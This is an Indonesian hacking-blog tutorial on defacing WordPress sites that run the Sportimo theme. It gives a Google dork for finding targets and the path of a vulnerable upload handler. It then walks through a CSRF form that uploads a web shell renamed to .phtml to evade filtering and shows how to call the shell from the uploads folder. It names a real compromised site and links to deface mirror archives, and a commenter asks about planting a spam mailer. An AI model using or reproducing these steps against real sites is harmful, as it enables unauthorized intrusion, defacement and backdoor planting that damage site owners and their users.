News Ticker

Deface Wordpress Themes Sportimo

By Berandal - Wednesday, February 1, 2017 5 Comments



Pagi fans :* Please say hello haters :P
Kali ini gw mau ksaih Tutorial Deface Wordpress Themes Sportimo.  Tutorial ini gak beda jauh sama tutorial sebelumnya :D

Baca: Tutorial Deface Wordpress Themes Radial.

Oke, sebelumnya kita siapin dulu bahan2 nya :D 

Bahan:  
 1. Dork
inurl:/wp-content/themes/sportimo 
2. Exploit
/wp-content/themes/sportimo-theme/functions/upload-handler.php
contoh
site.com/wp-content/themes/sportimo-theme/functions/upload-handler.php

3. Shell Backdoor atau Script Deface
Belum punya? Nih, Script Deface sederhana gw, COMOT

4. CSRF
CSRF copy disini. Simpan dalam format .html

Langkah - Langkah:
1. Dorking ke google.

2. Pilih salah satu site.

3. Masukkan exploitnya.

4. Kalo vuln bakal ada tulisan 'error'. Contoh:

  
5. Copy link yg vuln, paste di CSRF.

6. Buka CSRF, pilih file yg mau diupload, klik SIKAT!
NB: Kalo mau upload shell, rename dulu jadi .phtml contoh: shell.phtml

7. Kalo file sukses ke upload, bakal keluar nama file lu.

8.  Sekarang tinggal panggil file lu. Caranya?
/wp-content/uploads/tahun/bulan/namafile
contoh
http://kregle.net/wp-content/uploads/2017/01/o.phtml 

Kalo masih bingung, bisa liat video tutorial gw di bawah :)



 Ini hasil mirror an gw :
https://www.defacer.id/244106.html
https://1337mirror.com/12447.html

 Oke, sekian tutorial gw kali ini, see u next post :*

Regards,
Berandal, [OWL SQUAD]

POPULAR ARTICLES :


5 comments to ''Deface Wordpress Themes Sportimo"

ADD COMMENT
  1. mntab um , oh iya ane mau nnyak ni ,site wordpress apkah bs di tnam mailer jika sudah tertnam shell ?

    ReplyDelete